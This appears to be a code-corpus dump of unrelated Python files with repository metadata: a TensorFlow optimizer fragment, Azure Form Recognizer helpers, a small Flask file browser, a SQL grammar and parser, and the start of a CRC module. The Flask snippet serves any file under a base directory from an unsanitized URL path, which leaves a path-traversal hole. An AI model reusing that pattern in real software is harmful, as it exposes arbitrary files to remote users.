tf.cast(self._total_num_examples, var.dtype.base_dtype) *
diag_preconditioner)
def _resource_apply_dense(self, grad, var):
max_learning_rate = tf.where(
self.iterations < tf.cast(self._burnin, tf.int64),
self._burnin_max_learning_rate,
self._max_learning_rate)
learn_rates = tf.clip_by_value(
self._get_coordinatewise_learning_rate(grad, var), 0.,
tf.cast(max_learning_rate, var.dtype.base_dtype))
newgrad = grad * learn_rates
return training_ops.resource_apply_gradient_descent(
var.handle,
tf.cast(1., var.dtype),
newgrad,
use_locking=self._use_locking)
def _resource_apply_sparse(self, grad, var, indices):
max_learning_rate = tf.where(
self.iterations < tf.cast(self._burnin, tf.int64),
self._burnin_max_learning_rate, self._max_learning_rate)
learn_rate = tf.clip_by_value(
self._get_coordinatewise_learning_rate(
tf.IndexedSlices(grad, indices), var),
0., tf.cast(max_learning_rate, var.dtype))
delta = grad * learn_rate
return self._resource_scatter_add(var, indices, -delta)
| 41.707692 | 80 | 0.690612 |
4a2236d3a5fd5706a6d4ec78fb894a870d6ba414 | 4,395 | py | Python | sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_helpers.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_helpers.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_helpers.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import re
import six
from azure.core.credentials import AzureKeyCredential
from azure.core.pipeline.policies import AzureKeyCredentialPolicy
from azure.core.pipeline.transport import HttpTransport
POLLING_INTERVAL = 5
COGNITIVE_KEY_HEADER = "Ocp-Apim-Subscription-Key"
def _get_deserialize():
from ._generated.v2_1_preview_1 import FormRecognizerClient
return FormRecognizerClient("dummy", "dummy")._deserialize # pylint: disable=protected-access
def get_element_type(element_pointer):
word_ref = re.compile(r'/readResults/\d+/lines/\d+/words/\d+')
if re.search(word_ref, element_pointer):
return "word"
line_ref = re.compile(r'/readResults/\d+/lines/\d+')
if re.search(line_ref, element_pointer):
return "line"
return None
def get_element(element_pointer, read_result):
indices = [int(s) for s in re.findall(r"\d+", element_pointer)]
read = indices[0]
if get_element_type(element_pointer) == "word":
line = indices[1]
word = indices[2]
ocr_word = read_result[read].lines[line].words[word]
return "word", ocr_word, read+1
if get_element_type(element_pointer) == "line":
line = indices[1]
ocr_line = read_result[read].lines[line]
return "line", ocr_line, read+1
return None, None, None
def adjust_value_type(value_type):
if value_type == "array":
value_type = "list"
if value_type == "number":
value_type = "float"
if value_type == "object":
value_type = "dictionary"
return value_type
def adjust_confidence(score):
"""Adjust confidence when not returned.
"""
if score is None:
return 1.0
return score
def adjust_text_angle(text_angle):
"""Adjust to (-180, 180]
"""
if text_angle > 180:
text_angle -= 360
return text_angle
def get_authentication_policy(credential):
authentication_policy = None
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if isinstance(credential, AzureKeyCredential):
authentication_policy = AzureKeyCredentialPolicy(
name=COGNITIVE_KEY_HEADER, credential=credential
)
elif credential is not None and not hasattr(credential, "get_token"):
raise TypeError("Unsupported credential: {}. Use an instance of AzureKeyCredential "
"or a token credential from azure.identity".format(type(credential)))
return authentication_policy
def get_content_type(form):
"""Source: https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
"""
if isinstance(form, six.binary_type):
return check_beginning_bytes(form)
if hasattr(form, "read") and hasattr(form, "seek"):
beginning_bytes = form.read(4)
form.seek(0)
return check_beginning_bytes(beginning_bytes)
raise ValueError("Content type could not be auto-detected because the stream was not readable/seekable. "
"Please pass the content_type keyword argument.")
def check_beginning_bytes(form):
if len(form) > 3:
if form[:4] == b"\x25\x50\x44\x46":
return "application/pdf"
if form[:2] == b"\xff\xd8":
return "image/jpeg"
if form[:4] == b"\x89\x50\x4E\x47":
return "image/png"
if form[:4] == b"\x49\x49\x2A\x00": # little-endian
return "image/tiff"
if form[:4] == b"\x4D\x4D\x00\x2A": # big-endian
return "image/tiff"
raise ValueError("Content type could not be auto-detected. Please pass the content_type keyword argument.")
class TransportWrapper(HttpTransport):
"""Wrapper class that ensures that an inner client created
by a `get_client` method does not close the outer transport for the parent
when used in a context manager.
"""
def __init__(self, transport):
self._transport = transport
def send(self, request, **kwargs):
return self._transport.send(request, **kwargs)
def open(self):
pass
def close(self):
pass
def __enter__(self):
pass
def __exit__(self, *args): # pylint: disable=arguments-differ
pass
| 30.10274 | 111 | 0.653925 |
4a2236e719a3fd346780287adc40f8382ce37b5c | 563 | py | Python | flaskFlieBrow/app2.py | shivampip/FrontEnd | b43e5088baaa3accb9210a3093e982035c58cff1 | [
"MIT"
] | null | null | null | flaskFlieBrow/app2.py | shivampip/FrontEnd | b43e5088baaa3accb9210a3093e982035c58cff1 | [
"MIT"
] | null | null | null | flaskFlieBrow/app2.py | shivampip/FrontEnd | b43e5088baaa3accb9210a3093e982035c58cff1 | [
"MIT"
] | null | null | null | @app.route('/', defaults={'req_path': ''})
@app.route('/<path:req_path>')
def dir_listing(req_path):
BASE_DIR = '/Users/vivek/Desktop'
# Joining the base and the requested path
abs_path = os.path.join(BASE_DIR, req_path)
# Return 404 if path doesn't exist
if not os.path.exists(abs_path):
return abort(404)
# Check if path is a file and serve
if os.path.isfile(abs_path):
return send_file(abs_path)
# Show directory contents
files = os.listdir(abs_path)
return render_template('files.html', files=files) | 29.631579 | 53 | 0.669627 |
4a22387fe03d8a0a7204d1a2bab53edba7734244 | 10,139 | py | Python | src/compiler/parser.py | tsellam/syllabus | 112d9d47715a85181bd4afb19acfdd17a895eaad | [
"MIT"
] | null | null | null | src/compiler/parser.py | tsellam/syllabus | 112d9d47715a85181bd4afb19acfdd17a895eaad | [
"MIT"
] | null | null | null | src/compiler/parser.py | tsellam/syllabus | 112d9d47715a85181bd4afb19acfdd17a895eaad | [
"MIT"
] | 1 | 2021-04-15T04:51:05.000Z | 2021-04-15T04:51:05.000Z | import re
import math
import numpy as np
from ops import *
from parsimonious.grammar import Grammar
from parsimonious.nodes import NodeVisitor
exprgrammar = Grammar(
r"""
expr = biexpr / unexpr / value
biexpr = value ws binaryop ws expr
unexpr = unaryop expr
value = parenval /
number /
boolean /
function /
string /
attr
parenval = "(" ws expr ws ")"
function = fname "(" ws arg_list? ws ")"
arg_list = expr (ws "," ws expr)*
number = ~"\d*\.?\d+"i
string = ~"\'\w*\'"i
attr = ~"\w[\w\d]*"i
fname = ~"\w[\w\d]*"i
boolean = "true" / "false"
compound_op = "UNION" / "union"
binaryop = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">" / "and" / "or"
unaryop = "+" / "-" / "not"
ws = ~"\s*"i
wsp = ~"\s+"i
""")
grammar = Grammar(
r"""
query = select_cores orderby? limit?
select_cores = select_core (compound_op select_core)*
select_core = SELECT wsp select_results from_clause? where_clause? gb_clause?
select_results = select_result (ws "," ws select_result)*
select_result = sel_res_all_star / sel_res_tab_star / sel_res_val / sel_res_col
sel_res_tab_star = name ".*"
sel_res_all_star = "*"
sel_res_val = expr (AS wsp name)?
sel_res_col = col_ref (AS wsp name)
from_clause = FROM join_source
join_source = ws single_source (ws "," ws single_source)*
single_source = source_table / source_subq
source_table = table_name (AS wsp name)?
source_subq = "(" ws query ws ")" (AS ws name)?
where_clause = WHERE wsp expr (AND wsp expr)*
gb_clause = GROUP BY group_clause having_clause?
group_clause = grouping_term (ws "," grouping_term)*
grouping_term = ws expr
having_clause = HAVING expr
orderby = ORDER BY ordering_term (ws "," ordering_term)*
ordering_term = ws expr (ASC/DESC)?
limit = LIMIT wsp expr (OFFSET expr)?
col_ref = (table_name ".")? column_name
expr = btwnexpr / biexpr / unexpr / value
btwnexpr = value BETWEEN wsp value AND wsp value
biexpr = value ws binaryop_no_andor ws expr
unexpr = unaryop expr
value = parenval /
number /
boolean /
function /
col_ref /
string /
attr
parenval = "(" ws expr ws ")"
function = fname "(" ws arg_list? ws ")"
arg_list = expr (ws "," ws expr)*
number = ~"\d*\.?\d+"i
string = ~"([\"\'])(\\\\?.)*?\\1"i
attr = ~"\w[\w\d]*"i
fname = ~"\w[\w\d]*"i
boolean = "true" / "false"
compound_op = "UNION" / "union"
binaryop = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">" / "and" / "AND" / "or" / "OR"
binaryop_no_andor = "+" / "-" / "*" / "/" / "=" / "<>" /
"<=" / ">" / "<" / ">"
unaryop = "+" / "-" / "not"
ws = ~"\s*"i
wsp = ~"\s+"i
name = ~"[a-zA-Z]\w*"i
table_name = name
column_name = name
ADD = wsp "ADD"
ALL = wsp "ALL"
ALTER = wsp "ALTER"
AND = wsp ("AND" / "and")
AS = wsp ("AS" / "as")
ASC = wsp "ASC"
BETWEEN = wsp ("BETWEEN" / "between")
BY = wsp "BY"
CAST = wsp "CAST"
COLUMN = wsp "COLUMN"
DESC = wsp "DESC"
DISTINCT = wsp "DISTINCT"
E = "E"
ESCAPE = wsp "ESCAPE"
EXCEPT = wsp "EXCEPT"
EXISTS = wsp "EXISTS"
EXPLAIN = ws "EXPLAIN"
EVENT = ws "EVENT"
FORALL = wsp "FORALL"
FROM = wsp "FROM"
GLOB = wsp "GLOB"
GROUP = wsp "GROUP"
HAVING = wsp "HAVING"
IN = wsp "IN"
INNER = wsp "INNER"
INSERT = ws "INSERT"
INTERSECT = wsp "INTERSECT"
INTO = wsp "INTO"
IS = wsp "IS"
ISNULL = wsp "ISNULL"
JOIN = wsp "JOIN"
KEY = wsp "KEY"
LEFT = wsp "LEFT"
LIKE = wsp "LIKE"
LIMIT = wsp "LIMIT"
MATCH = wsp "MATCH"
NO = wsp "NO"
NOT = wsp "NOT"
NOTNULL = wsp "NOTNULL"
NULL = wsp "NULL"
OF = wsp "OF"
OFFSET = wsp "OFFSET"
ON = wsp "ON"
OR = wsp "OR"
ORDER = wsp "ORDER"
OUTER = wsp "OUTER"
PRIMARY = wsp "PRIMARY"
QUERY = wsp "QUERY"
RAISE = wsp "RAISE"
REFERENCES = wsp "REFERENCES"
REGEXP = wsp "REGEXP"
RENAME = wsp "RENAME"
REPLACE = ws "REPLACE"
RETURN = wsp "RETURN"
ROW = wsp "ROW"
SAVEPOINT = wsp "SAVEPOINT"
SELECT = ws "SELECT"
SET = wsp "SET"
TABLE = wsp "TABLE"
TEMP = wsp "TEMP"
TEMPORARY = wsp "TEMPORARY"
THEN = wsp "THEN"
TO = wsp "TO"
UNION = wsp "UNION"
USING = wsp "USING"
VALUES = wsp "VALUES"
VIRTUAL = wsp "VIRTUAL"
WITH = wsp "WITH"
WHERE = wsp "WHERE"
"""
)
def flatten(children, sidx, lidx):
ret = [children[sidx]]
rest = children[lidx]
if not isinstance(rest, list): rest = [rest]
ret.extend(filter(bool, rest))
return ret
class Visitor(NodeVisitor):
"""
Each expression of the form
XXX = ....
in the grammar can be handled with a custom function by writing
def visit_XXX(self, node, children):
You can assume the elements in children are the handled
versions of the corresponding child nodes
"""
grammar = grammar
def visit_query(self, node, children):
nodes = filter(bool, children[1:])
ret = children[0]
for n in nodes:
n.c = ret
ret = n
return ret
#
# SELECT CLAUSE
#
def visit_select_cores(self, node, children):
l = filter(bool, children[1])
if len(l):
raise Exception("We don't support multiple SELECT cores")
return children[0]
def visit_select_core(self, node, children):
selectc, fromc, wherec, gbc = tuple(children[2:])
nodes = filter(bool, [fromc, wherec, gbc, selectc])
ret = None
for n in nodes:
if not ret:
ret = n
else:
n.c = ret
ret = n
return ret
def visit_select_results(self, node, children):
allexprs = flatten(children, 0, 1)
print allexprs
exprs, aliases = zip(*allexprs)
return Project(None, exprs, aliases)
def visit_sel_res_tab_star(self, node, children):
return (Star(children[0]), None)
def visit_sel_res_all_star(self, node, children):
return (Star(), None)
def visit_sel_res_val(self, node, children):
return (children[0], children[1] or None)
def visit_sel_res_col(self, node, children):
return (children[0], children[1] or None)
#
# FROM CLAUSE
#
def visit_from_clause(self, node, children):
return children[1]
def visit_join_source(self, node, children):
sources = flatten(children, 1, 2)
return From(sources)
def visit_source_table(self, node, children):
tname = children[0]
alias = children[1] or tname
return Scan(tname, alias)
def visit_source_subq(self, node, children):
subq = children[2]
alias = children[5]
return SubQuerySource(subq, alias)
#
# Other clauses
#
def visit_where_clause(self, node, children):
exprs = flatten(children, 2, -1)
ret = exprs[0]
for e in exprs[1:]:
ret = Expr("and", e, ret)
return Filter(None, ret)
def visit_gb_clause(self, node, children):
gb = children[2]
having = children[3]
if having:
having.c = gb
return having
return gb
def visit_group_clause(self, node, children):
groups = flatten(children, 0, 1)
return GroupBy(None, groups)
def visit_grouping_term(self, node, children):
return children[1]
def visit_having_clause(self, node, children):
return children[1]
def visit_orderby(self, node, children):
terms = flatten(children, 2, 3)
exprs, ascdesc = zip(*terms)
return OrderBy(None, exprs, ascdesc)
def visit_ordering_term(self, node, children):
expr = children[1]
order = children[2] or "asc"
return (expr, order)
def visit_limit(self, node, children):
if children[3]:
print "WARN: don't support offset yet"
return Limit(None, children[2])
def visit_col_ref(self, node, children):
return Attr(children[1], children[0])
def visit_name(self, node, children):
return node.text
def visit_attr(self, node, children):
return Attr(node.text)
def visit_binaryop(self, node, children):
return node.text
def visit_binaryop_no_andor(self, node, children):
return node.text
def visit_biexpr(self, node, children):
return Expr(children[2], children[0], children[-1])
def visit_unexpr(self, node, children):
return Expr(children[0], children[1])
def visit_btwnexpr(self, node, children):
v1, v2, v3 = children[0], children[3], children[-1]
def visit_expr(self, node, children):
return children[0]
def visit_function(self, node, children):
fname = children[0]
arglist = children[3]
return Func(fname, arglist)
def visit_fname(self, node, children):
return node.text
def visit_arg_list(self, node, children):
return flatten(children, 0, 1)
def visit_number(self, node, children):
return Literal(float(node.text))
def visit_string(self, node, children):
return Literal(node.text)
def visit_parenval(self, node, children):
return children[2]
def visit_value(self, node, children):
return children[0]
def visit_parenval(self, node, children):
return children[2]
def visit_boolean(self, node, children):
if node.text == "true":
return Literal(True)
return Literal(False)
def generic_visit(self, node, children):
children = filter(lambda v: v and (not isinstance(v, basestring) or v.strip()), children)
if len(children) == 1:
return children[0]
return children
class ExprVisitor(Visitor):
grammar = exprgrammar
def parse(s):
return Visitor().parse(s)
def parseexpr(s):
return ExprVisitor().parse(s)
if __name__ == "__main__":
import click
@click.command()
@click.option("-c", type=str)
def run(c="(a+a) > 3"):
print c
ast = parse(c)
print "printing ast"
print ast
run()
| 25.284289 | 93 | 0.58921 |
4a2238f98b11015eaf5cb776cdf0edc09d2e691b | 391 | py | Python | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | quizzes/asgi.py | TheShubhendra/quizzes-backend | 90e161281ec02599b17c6f0a9fdd20bddf25bfe7 | [
"MIT"
] | null | null | null | """
ASGI config for quizzes project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "quizzes.settings")
application = get_asgi_application()
| 23 | 78 | 0.785166 |
4a2239408e9639e65017c52bb225820757c22afa | 490 | py | Python | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | tests/r/test_npk.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.npk import npk
def test_npk():
"""Test module npk.py by downloading
npk.csv and testing shape of
extracted data has 24 rows and 5 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = npk(test_path)
try:
assert x_train.shape == (24, 5)
except:
shutil.rmtree(test_path)
raise()
| 20.416667 | 43 | 0.740816 |
4a223a944a3e6d66d1e0a33f254a78f60c00f6ec | 1,079 | py | Python | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | GTApack/GTA_tester.py | marctimjen/Deep_final | ca4de1e04e00706b53c356e1ccc57c7bdfe715f5 | [
"MIT"
] | null | null | null | import torch
import numpy as np
def GTA_tester(model, testloader, p = True):
"""
This function calculates the accuarcy of a model (network) given an input
and target. Note that this testor only works for the networks with onehot
encoding.
Args:
model: The model (network) we want to test the accuarcy for.
testloader (generator): The testloader is a generator object that
deliver the input and target.
p (bool): This value tells the function if it should print the progress.
Returns:
list: With the means of the pixel-accuarcy per images.
"""
count = 0
test_acc_per_pix = []
for img, lab in testloader:
if p:
count += 1
print("test count:", count)
with torch.no_grad():
y_pred = model(img)
for i in range(lab.shape[0]):
test_acc_per_pix.append(np.mean(
(torch.argmax(y_pred[i].cpu().detach(), dim = 0) ==
torch.argmax(lab[i].cpu(), dim = 0)).numpy()))
return test_acc_per_pix
| 29.972222 | 80 | 0.60241 |
4a223aa466773121ab82dcf320eff6e156a7b619 | 4,771 | py | Python | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 1 | 2021-12-14T14:46:42.000Z | 2021-12-14T14:46:42.000Z | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 562 | 2019-06-21T18:44:38.000Z | 2022-03-28T18:09:08.000Z | dojo/importers/utils.py | axelpavageau/django-DefectDojo | 00b425742b783ada0f432241c2812ac1257feb73 | [
"BSD-3-Clause"
] | 2 | 2021-09-16T18:30:17.000Z | 2021-09-17T00:46:38.000Z | from dojo.utils import max_safe
from dojo.tools.factory import import_parser_factory
from dojo.models import IMPORT_CLOSED_FINDING, IMPORT_CREATED_FINDING, IMPORT_REACTIVATED_FINDING, Test_Import, Test_Import_Finding_Action
import logging
logger = logging.getLogger(__name__)
def parse_findings(scan, test, active, verified, scan_type):
try:
parser = import_parser_factory(scan,
test,
active,
verified,
scan_type)
parsed_findings = parser.get_findings(scan, test)
return parsed_findings
except SyntaxError as se:
logger.exception(se)
logger.warn("Error in parser: {}".format(str(se)))
raise
except ValueError as ve:
logger.exception(ve)
logger.warn("Error in parser: {}".format(str(ve)))
raise
except Exception as e:
logger.exception(e)
logger.warn("Error in parser: {}".format(str(e)))
raise
def update_timestamps(test, scan_date, version, branch_tag, build_id, commit_hash, now, scan_date_time):
test.engagement.updated = now
if test.engagement.engagement_type == 'CI/CD':
test.engagement.target_end = max_safe([scan_date_time.date(), test.engagement.target_end])
test.updated = now
test.target_end = max_safe([scan_date_time, test.target_end])
if version:
test.version = version
if branch_tag:
test.branch_tag = branch_tag
test.engagement.version = version
if build_id:
test.build_id = build_id
if branch_tag:
test.commit_hash = commit_hash
test.save()
test.engagement.save()
def update_import_history(type, active, verified, tags, minimum_severity, endpoints_to_add, version, branch_tag,
build_id, commit_hash, push_to_jira, close_old_findings, test,
new_findings=[], closed_findings=[], reactivated_findings=[]):
logger.debug("new: %d closed: %d reactivated: %d", len(new_findings), len(closed_findings), len(reactivated_findings))
# json field
import_settings = {}
import_settings['active'] = active
import_settings['verified'] = verified
import_settings['minimum_severity'] = minimum_severity
import_settings['close_old_findings'] = close_old_findings
import_settings['push_to_jira'] = push_to_jira
import_settings['tags'] = tags
# tags=tags TODO no tags field in api for reimport it seems
if endpoints_to_add:
import_settings['endpoints'] = [str(endpoint) for endpoint in endpoints_to_add]
test_import = Test_Import(test=test, import_settings=import_settings, version=version, branch_tag=branch_tag, build_id=build_id, commit_hash=commit_hash, type=type)
test_import.save()
test_import_finding_action_list = []
for finding in closed_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CLOSED_FINDING))
for finding in new_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_CREATED_FINDING))
for finding in reactivated_findings:
logger.debug('preparing Test_Import_Finding_Action for finding: %i', finding.id)
test_import_finding_action_list.append(Test_Import_Finding_Action(test_import=test_import, finding=finding, action=IMPORT_REACTIVATED_FINDING))
Test_Import_Finding_Action.objects.bulk_create(test_import_finding_action_list)
def construct_imported_message(scan_type, finding_count=0, new_finding_count=0, closed_finding_count=0, reactivated_finding_count=0, untouched_finding_count=0):
if finding_count:
message = f'{scan_type} processed a total of {finding_count} findings'
if new_finding_count:
message = message + ' created %d findings' % (new_finding_count)
if closed_finding_count:
message = message + ' closed %d findings' % (closed_finding_count)
if reactivated_finding_count:
message = message + ' reactivated %d findings' % (reactivated_finding_count)
if untouched_finding_count:
message = message + ' did not touch %d findings' % (untouched_finding_count)
message = message + "."
else:
message = 'No findings were added/updated/closed/reactivated as the findings in Defect Dojo are identical to those in the uploaded report.'
return message
| 43.770642 | 168 | 0.70174 |
4a223b25a4666a8d0945829170ab34b6ba745d1f | 3,405 | py | Python | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | preprocessing.py | Mamxlam/legumeRecognition | ddf00edecb6f2527134842e2ff7f118747882dde | [
"Apache-2.0"
] | null | null | null | import numpy as np
import cv2
import glob
from skimage import feature
from sklearn.preprocessing import MinMaxScaler,LabelEncoder
from matplotlib import pyplot as plt
import csv
import pandas as pd
import h5py
def importing_images():
images = []
beans_files = sorted(glob.glob ("beans\\*.jpg"))
chickpeas_files = sorted(glob.glob ("chickpea\\*.jpg"))
hazelnuts_files = sorted(glob.glob ("hazelnut\\*.jpg"))
lentil_files = sorted(glob.glob ("lentil\\*.jpg"))
for myFile in beans_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in chickpeas_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in hazelnuts_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
for myFile in lentil_files:
print(myFile)
image = cv2.imread (myFile)
images.append(image)
return images
def resize(image):
height = 256
width = 256
dim = (width,height)
res_img = cv2.resize(image,dim,interpolation=cv2.INTER_LINEAR)
return res_img
def lbp_histograms(image,numPoints,radius):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
lbp = feature.local_binary_pattern(gray, numPoints, radius, method="default")
x, bin_edges = np.histogram(lbp.ravel(), bins=256)
hist = x / sum(x)
return hist
def hu_moments(image):
image = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
feature = cv2.HuMoments(cv2.moments(image)).flatten()
return feature
def color_histogram(image, mask=None):
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])
cv2.normalize(hist, hist)
return hist.flatten()
#Starting program
#Initializing feature list
global_features = []
#making target list
y = []
for x in range(50):
y.append("bean")
for x in range(50):
y.append("chickpea")
for x in range(50):
y.append("hazelnut")
for x in range(50):
y.append("lentil")
#y_t = np.array(y).T
images = importing_images()
for x in range(200):
images[x] = resize(images[x])
print("Image ", x , " resized...")
images_for_desc = images
for x in range(200):
current_hist = lbp_histograms(images_for_desc[x],8,2)
current_moment = hu_moments(images_for_desc[x])
current_color = color_histogram(images_for_desc[x])
global_feature = np.hstack([current_hist,current_moment,current_color])
global_features.append(global_feature)
print("Iteration ", x, " / Current image features extracted...")
#Normalizing features by scaling them
print("Normalizing feature vector")
scaler = MinMaxScaler(feature_range=(0,1))
scaled_features = scaler.fit_transform(global_features)
labelEncoder = LabelEncoder()
target = labelEncoder.fit_transform(y)
#y = np.array(y).astype(int)
#Saving in h5 file
print("Saving features and targets...")
h5f_features = h5py.File('data.h5', 'w')
h5f_features.create_dataset('dataset_1', data = np.array(scaled_features))
h5f_targets = h5py.File('labels.h5', 'w')
h5f_targets.create_dataset('dataset_1', data = np.array(target))
h5f_features.close()
h5f_targets.close()
#print(len(images))
#print(len(y_t),y_t)
| 25.795455 | 87 | 0.664611 |
4a223bd3ee9cc6269445fd36f2b8841abb241359 | 27,025 | py | Python | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | syss_crc.py | quartiq/ai9 | edb406594d1eafe844f6aa3ce9159bef42717d73 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
SySS CRC
Simple Python CRC implementation for playing around with cyclic redundancy
checks, for instance when analyzing undocumented protocols or file formats
by Matthias Deeg <[email protected]>
inspired by Online CRC Calculator by Anton Isakov (https://crccalc.com/)
and Sunshine2k's CRC Calculator by Bastian Molkenthin
(http://www.sunshine2k.de/coding/javascript/crc/crc_js.html)
MIT License
Copyright (c) 2018, 2019 SySS GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__version__ = '0.3'
__author__ = 'Matthias Deeg'
# look-up table for faster bit order reversing
REVERSE_BITS_LUT = [
0x00, 0x80, 0x40, 0xC0, 0x20, 0xA0, 0x60, 0xE0, 0x10, 0x90, 0x50, 0xD0, 0x30, 0xB0, 0x70, 0xF0,
0x08, 0x88, 0x48, 0xC8, 0x28, 0xA8, 0x68, 0xE8, 0x18, 0x98, 0x58, 0xD8, 0x38, 0xB8, 0x78, 0xF8,
0x04, 0x84, 0x44, 0xC4, 0x24, 0xA4, 0x64, 0xE4, 0x14, 0x94, 0x54, 0xD4, 0x34, 0xB4, 0x74, 0xF4,
0x0C, 0x8C, 0x4C, 0xCC, 0x2C, 0xAC, 0x6C, 0xEC, 0x1C, 0x9C, 0x5C, 0xDC, 0x3C, 0xBC, 0x7C, 0xFC,
0x02, 0x82, 0x42, 0xC2, 0x22, 0xA2, 0x62, 0xE2, 0x12, 0x92, 0x52, 0xD2, 0x32, 0xB2, 0x72, 0xF2,
0x0A, 0x8A, 0x4A, 0xCA, 0x2A, 0xAA, 0x6A, 0xEA, 0x1A, 0x9A, 0x5A, 0xDA, 0x3A, 0xBA, 0x7A, 0xFA,
0x06, 0x86, 0x46, 0xC6, 0x26, 0xA6, 0x66, 0xE6, 0x16, 0x96, 0x56, 0xD6, 0x36, 0xB6, 0x76, 0xF6,
0x0E, 0x8E, 0x4E, 0xCE, 0x2E, 0xAE, 0x6E, 0xEE, 0x1E, 0x9E, 0x5E, 0xDE, 0x3E, 0xBE, 0x7E, 0xFE,
0x01, 0x81, 0x41, 0xC1, 0x21, 0xA1, 0x61, 0xE1, 0x11, 0x91, 0x51, 0xD1, 0x31, 0xB1, 0x71, 0xF1,
0x09, 0x89, 0x49, 0xC9, 0x29, 0xA9, 0x69, 0xE9, 0x19, 0x99, 0x59, 0xD9, 0x39, 0xB9, 0x79, 0xF9,
0x05, 0x85, 0x45, 0xC5, 0x25, 0xA5, 0x65, 0xE5, 0x15, 0x95, 0x55, 0xD5, 0x35, 0xB5, 0x75, 0xF5,
0x0D, 0x8D, 0x4D, 0xCD, 0x2D, 0xAD, 0x6D, 0xED, 0x1D, 0x9D, 0x5D, 0xDD, 0x3D, 0xBD, 0x7D, 0xFD,
0x03, 0x83, 0x43, 0xC3, 0x23, 0xA3, 0x63, 0xE3, 0x13, 0x93, 0x53, 0xD3, 0x33, 0xB3, 0x73, 0xF3,
